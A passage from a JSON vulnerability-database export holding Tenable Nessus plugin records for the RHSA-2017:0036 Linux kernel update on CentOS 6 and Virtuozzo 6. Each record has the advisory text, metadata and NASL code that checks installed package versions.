link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n* When parallel NFS returned a file layout, a kernel crash sometimes occurred. This update removes the call to the BUG_ON() function from a code path of a client that returns the file layout. As a result, the kernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash on a Nonmaskable Interrupt (NMI) that was injected from the host, this VM became unresponsive and did not create the vmcore dump file. This update applies a set of patches to the Virtual Machine Bus kernel driver (hv_vmbus) that fix this bug. As a result, the VM now first creates and saves the vmcore dump file and then reboots.\n(BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache occasionally showed incorrect values. This update fixes the DST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct values. (BZ# 1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet (FCoE) stack, suboptimal performance in some cases occurred on systems with a large number of CPUs. This update fixes the fc_exch_alloc() function to try all the available exchange managers in the list for an available exchange ID. This change avoids failing allocations, which previously led to the host busy status.\n(BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution automatically. Consequently, users were not able to change the resolution by manual setting of the kernel's 'vga=' parameter in the /boot/grub/ grub.conf file. This update adds the 'nomodeset' parameter, which can be set in the /boot/grub/grub.conf file. The 'nomodeset' parameter allows the users to prevent the vmwgfx driver from loading. As a result, the setting of the 'vga=' parameter works as expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based systems, Desktop Management Interface (DMI) information, which is referenced by several applications, such as NEC server's memory RAS utility, was missing entries in the sysfs virtual file system. This update fixes the underlying source code, and sysfs now shows the DMI information as expected. (BZ# 1393464)\n\n* Previously, bonding mode active backup and the propagation of the media access control (MAC) address to a VLAN interface did not work in Red Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter was set to fail_over_mac=active. With this update, the underlying source code has been fixed so that the VLANs continue inheriting the MAC address of the active physical interface until the VLAN MAC address is explicitly set to any value. As a result, IPv6 EUI64 addresses for the VLAN can reflect any changes to the MAC address of the physical interface, and Duplicate Address Detection (DAD) behaves as expected. (BZ#1396479)", "edition": 8, "reporter": "Tenable", "published": "2017-01-13T00:00:00", "title": "CentOS 6 : kernel (CESA-2017:0036)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-firmware", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2017-0036.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96456", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0036 and \n# CentOS Errata and Security Advisory 2017:0036 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96456);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:32\");\n\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_xref(name:\"RHSA\", value:\"2017:0036\");\n\n script_name(english:\"CentOS 6 : kernel (CESA-2017:0036)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernels socket\nrecvmmsg subsystem. This may allow remote attackers to corrupt memory\nand may allow execution of arbitrary code. This corruption takes place\nduring the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service,\nheap disclosure, or further impact was found in setsockopt(). The\nfunction call is normally restricted to root, however some processes\nwith cap_sys_admin may also be able to trigger this flaw in privileged\ncontainer environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in\ntcp_xmit_retransmit_queue and other tcp_* functions. This condition\ncould allow an attacker to send an incorrect selective acknowledgment\nto existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a\ncode path of a client that returns the file layout. As a result, the\nkernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to\ncrash on a Nonmaskable Interrupt (NMI) that was injected from the\nhost, this VM became unresponsive and did not create the vmcore dump\nfile. This update applies a set of patches to the Virtual Machine Bus\nkernel driver (hv_vmbus) that fix this bug. As a result, the VM now\nfirst creates and saves the vmcore dump file and then reboots.\n(BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the\nDST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct\nvalues. (BZ# 1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over\nEthernet (FCoE) stack, suboptimal performance in some cases occurred\non systems with a large number of CPUs. This update fixes the\nfc_exch_alloc() function to try all the available exchange managers in\nthe list for an available exchange ID. This change avoids failing\nallocations, which previously led to the host busy status.\n(BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot\nresolution automatically. Consequently, users were not able to change\nthe resolution by manual setting of the kernel's 'vga=' parameter in\nthe /boot/grub/ grub.conf file. This update adds the 'nomodeset'\nparameter, which can be set in the /boot/grub/grub.conf file. The\n'nomodeset' parameter allows the users to prevent the vmwgfx driver\nfrom loading. As a result, the setting of the 'vga=' parameter works\nas expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based\nsystems, Desktop Management Interface (DMI) information, which is\nreferenced by several applications, such as NEC server's memory RAS\nutility, was missing entries in the sysfs virtual file system. This\nupdate fixes the underlying source code, and sysfs now shows the DMI\ninformation as expected. (BZ# 1393464)\n\n* Previously, bonding mode active backup and the propagation of the\nmedia access control (MAC) address to a VLAN interface did not work in\nRed Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter\nwas set to fail_over_mac=active. With this update, the underlying\nsource code has been fixed so that the VLANs continue inheriting the\nMAC address of the active physical interface until the VLAN MAC\naddress is explicitly set to any value. As a result, IPv6 EUI64\naddresses for the VLAN can reflect any changes to the MAC address of\nthe physical interface, and Duplicate Address Detection (DAD) behaves\nas expected. (BZ#1396479)\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-January/022206.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?de863180\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-abi-whitelists-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-debug-devel-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-devel-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-doc-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-firmware-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"kernel-headers-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"perf-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"python-perf-2.6.32-642.13.1.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-21T05:37:36", "references": ["http://www.nessus.org/u?b93f0c8f", "https://access.redhat.com/errata/RHSA-2017-0036"], "pluginID": "101405", "description": "An update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n* When parallel NFS returned a file layout, a kernel crash sometimes occurred. This update removes the call to the BUG_ON() function from a code path of a client that returns the file layout. As a result, the kernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash on a Nonmaskable Interrupt (NMI) that was injected from the host, this VM became unresponsive and did not create the vmcore dump file. This update applies a set of patches to the Virtual Machine Bus kernel driver (hv_vmbus) that fix this bug. As a result, the VM now first creates and saves the vmcore dump file and then reboots.\n(BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache occasionally showed incorrect values. This update fixes the DST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct values. (BZ# 1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet (FCoE) stack, suboptimal performance in some cases occurred on systems with a large number of CPUs. This update fixes the fc_exch_alloc() function to try all the available exchange managers in the list for an available exchange ID. This change avoids failing allocations, which previously led to the host busy status.\n(BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution automatically. Consequently, users were not able to change the resolution by manual setting of the kernel's 'vga=' parameter in the /boot/grub/ grub.conf file. This update adds the 'nomodeset' parameter, which can be set in the /boot/grub/grub.conf file. The 'nomodeset' parameter allows the users to prevent the vmwgfx driver from loading. As a result, the setting of the 'vga=' parameter works as expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based systems, Desktop Management Interface (DMI) information, which is referenced by several applications, such as NEC server's memory RAS utility, was missing entries in the sysfs virtual file system. This update fixes the underlying source code, and sysfs now shows the DMI information as expected. (BZ# 1393464)\n\n* Previously, bonding mode active backup and the propagation of the media access control (MAC) address to a VLAN interface did not work in Red Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter was set to fail_over_mac=active. With this update, the underlying source code has been fixed so that the VLANs continue inheriting the MAC address of the active physical interface until the VLAN MAC address is explicitly set to any value. As a result, IPv6 EUI64 addresses for the VLAN can reflect any changes to the MAC address of the physical interface, and Duplicate Address Detection (DAD) behaves as expected. (BZ#1396479)\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 12, "reporter": "Tenable", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 6 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0036)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Virtuozzo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "modified": "2018-11-20T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:kernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-headers", "p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists", "p-cpe:/a:virtuozzo:virtuozzo:kernel-firmware", "p-cpe:/a:virtuozzo:virtuozzo:kernel", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel", "p-cpe:/a:virtuozzo:virtuozzo:python-perf", "cpe:/o:virtuozzo:virtuozzo:6", "p-cpe:/a:virtuozzo:virtuozzo:kernel-doc", "p-cpe:/a:virtuozzo:virtuozzo:kernel-debug", "p-cpe:/a:virtuozzo:virtuozzo:perf"], "id": "VIRTUOZZO_VZLSA-2017-0036.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=101405", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101405);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\n \"CVE-2016-4998\",\n \"CVE-2016-6828\",\n \"CVE-2016-7117\"\n );\n\n script_name(english:\"Virtuozzo 6 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0036)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernels socket\nrecvmmsg subsystem. This may allow remote attackers to corrupt memory\nand may allow execution of arbitrary code. This corruption takes place\nduring the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service,\nheap disclosure, or further impact was found in setsockopt(). The\nfunction call is normally restricted to root, however some processes\nwith cap_sys_admin may also be able to trigger this flaw in privileged\ncontainer environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in\ntcp_xmit_retransmit_queue and other tcp_* functions. This condition\ncould allow an attacker to send an incorrect selective acknowledgment\nto existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a\ncode path of a client that returns the file layout. As a result, the\nkernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to\ncrash on a Nonmaskable Interrupt (NMI) that was injected from the\nhost, this VM became unresponsive and did not create the vmcore dump\nfile. This update applies a set of patches to the Virtual Machine Bus\nkernel driver (hv_vmbus) that fix this bug. As a result, the VM now\nfirst creates and saves the vmcore dump file and then reboots.\n(BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the\nDST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct\nvalues. (BZ# 1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over\nEthernet (FCoE) stack, suboptimal performance in some cases occurred\non systems with a large number of CPUs. This update fixes the\nfc_exch_alloc() function to try all the available exchange managers in\nthe list for an available exchange ID. This change avoids failing\nallocations, which previously led to the host busy status.\n(BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot\nresolution automatically. Consequently, users were not able to change\nthe resolution by manual setting of the kernel's 'vga=' parameter in\nthe /boot/grub/ grub.conf file. This update adds the 'nomodeset'\nparameter, which can be set in the /boot/grub/grub.conf file. The\n'nomodeset' parameter allows the users to prevent the vmwgfx driver\nfrom loading. As a result, the setting of the 'vga=' parameter works\nas expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based\nsystems, Desktop Management Interface (DMI) information, which is\nreferenced by several applications, such as NEC server's memory RAS\nutility, was missing entries in the sysfs virtual file system. This\nupdate fixes the underlying source code, and sysfs now shows the DMI\ninformation as expected. (BZ# 1393464)\n\n* Previously, bonding mode active backup and the propagation of the\nmedia access control (MAC) address to a VLAN interface did not work in\nRed Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter\nwas set to fail_over_mac=active. With this update, the underlying\nsource code has been fixed so that the VLANs continue inheriting the\nMAC address of the active physical interface until the VLAN MAC\naddress is explicitly set to any value. As a result, IPv6 EUI64\naddresses for the VLAN can reflect any changes to the MAC address of\nthe physical interface, and Duplicate Address Detection (DAD) behaves\nas expected. (BZ#1396479)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0036.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b93f0c8f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0036\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel / kernel-abi-whitelists / kernel-debug / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-2.6.32-642.13.1.vl6\",\n \"kernel-abi-whitelists-2.6.32-642.13.1.vl6\",\n \"kernel-debug-2.6.32-642.13.1.vl6\",\n \"kernel-debug-devel-2.6.32-642.13.1.vl6\",\n \"kernel-devel-2.6.32-642.13.1.vl6\",\n \"kernel-doc-2.6.32-642.13.1.vl6\",\n \"kernel-firmware-2.6.32-642.13.1.vl6\",\n \"kernel-headers-2.6.32-642.13.1.vl6\",\n \"perf-2.6.32-642.13.1.vl6\",\n \"python-perf-2.6.32-642.13.1.vl6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T17:11:40", "references": ["https://access.redhat.com/errata/RHSA-2017:0036", "https://access.redhat.com/security/cve/cve-2016-6828", "https://access.redhat.com/security/cve/cve-2016-4998", "https://access.redhat.com/security/cve/cve-2016-7117"], "pluginID": "96403", "description": "An update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n* When parallel NFS returned a file layout, a kernel crash sometimes occurred. This update removes the call to the BUG_ON() function from a code path of a client that returns the file layout. As a result, the kernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash on a Nonmaskable Interrupt (NMI) that was injected from the host, this VM became unresponsive and did not create the vmcore dump file. This update applies a set of patches to the Virtual Machine Bus kernel driver (hv_vmbus) that fix this bug. As a result, the VM now first creates and saves the vmcore dump file and then reboots.\n(BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache occasionally showed incorrect values. This update fixes the DST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct values. (BZ# 1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet (FCoE) stack, suboptimal performance in some cases occurred on systems with a large number of CPUs. This update fixes the fc_exch_alloc() function to try all the available exchange managers in the list for an available exchange ID. This change avoids failing allocations, which previously led to the host busy status.\n(BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution automatically. Consequently, users were not able to change the resolution by manual setting of the kernel's 'vga=' parameter in the /boot/grub/ grub.conf file. This update adds the 'nomodeset' parameter, which can be set in the /boot/grub/grub.conf file. The 'nomodeset' parameter allows the users to prevent the vmwgfx driver from loading. As a result, the setting of the 'vga=' parameter works as expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based systems, Desktop Management Interface (DMI) information, which is referenced by several applications, such as NEC server's memory RAS utility, was missing entries in the sysfs virtual file system. This update fixes the underlying source code, and sysfs now shows the DMI information as expected. (BZ# 1393464)\n\n* Previously, bonding mode active backup and the propagation of the media access control 